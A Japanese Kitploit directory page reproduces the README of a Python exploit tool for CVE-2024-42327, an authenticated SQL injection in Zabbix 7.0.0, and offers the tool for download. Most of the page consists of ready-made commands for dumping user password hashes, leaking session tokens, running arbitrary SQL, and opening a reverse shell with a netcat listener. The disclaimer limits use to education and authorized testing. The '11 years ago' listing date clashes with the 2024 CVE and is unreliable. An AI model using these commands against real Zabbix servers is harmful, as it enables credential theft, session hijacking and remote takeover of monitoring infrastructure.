Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-42327_Zabbix_SQLi — これは教育目的のみです。許可されていないシステムに対して使用しないでください。 | Kitploit
ツール/GitHubGitHub/874anthony/cve-2024-42327_zabbix_sqli
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育
GitHub874anthony/cve-2024-42327_zabbix_sqli

CVE-2024-42327_Zabbix_SQLi

これは教育目的のみです。許可されていないシステムに対して使用しないでください。

リポジトリを見る
11年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

🛡️ Zabbix 7.0.0 SQLインジェクションエクスプロイトスクリプト

認証済みのZabbix 7.0.0 SQLインジェクション脆弱性を悪用するPythonスクリプトで、ユーザーデータ抽出、セッショントークン漏洩、リモートコマンド実行(RCE)、カスタムクエリインジェクションなど、複数の動作モードをサポートしています。

⚠️ 免責事項:
このスクリプトは教育目的および許可されたペネトレーションテストのみを対象としています。
所有していない、または明示的なテスト許可がないシステムでは使用しないでください。
著者は、このツールの誤用またはそれによって生じた損害について一切の責任を負いません。


✨ 機能

  • ✅ Zabbix 7.0.0に対する認証済みSQLインジェクション
  • 🧑‍💻 データベースからユーザーハッシュをダンプ
  • 🔐 セッショントークンを漏洩
  • 🐚 リバースシェルによるリモートコード実行(管理者トークンが必要)
  • 🧠 カスタムSQLクエリを実行

🔧 要件

  • Python 3.6+
  • requests ライブラリ

必要に応じて依存関係をインストール:

root@kitploit:~
pip install requests

🚀 使用方法

root@kitploit:~
python3 sqliZabbix.py -u <ZABBIX_URL> -U <USERNAME> -p <PASSWORD> --mode <MODE> [optional args...]

🔘 利用可能なモード

モード説明管理者トークンが必要か
leak-usersすべてのユーザーID、ユーザー名、パスワードハッシュ、ロールをダンプ❌
leak-tokensデータベースからすべてのアクティブなセッションIDをダンプ❌
rceitem.createエクスプロイトを介してリバースシェルを起動✅
customインジェクションを介して任意のカスタムSQLクエリを実行❌

🧪 使用例

ユーザーハッシュのダンプ

root@kitploit:~
python3 sqliZabbix.py -u http://target/zabbix/ -U guest -p guest --mode leak-users

セッショントークンの漏洩

root@kitploit:~
python3 sqliZabbix.py -u http://target/zabbix/ -U guest -p guest --mode leak-tokens

リモートコード実行(リバースシェル)

root@kitploit:~
# Start a listener first:
nc -lvnp 9001

# Then run:
python3 sqliZabbix.py -u http://target/zabbix/ -U guest -p guest --admin_token <ADMIN_API_TOKEN> --ip <YOUR_IP> --port 9001 --mode rce

カスタムSQLインジェクション

root@kitploit:~
python3 sqliZabbix.py -u http://target/zabbix/ -U guest -p guest --mode custom --query "SELECT version()"

📁 プロジェクト構成

root@kitploit:~
sqliZabbix.py      # Main exploit script
README.md          # This documentation

🧑‍💻 作者

Anthony (@874anthony)

愛情と好奇心を込めて作成 🐍

🔐 ライセンス

このプロジェクトはMITライセンスの下で公開されています。責任を持ってご使用ください。

ツールをダウンロード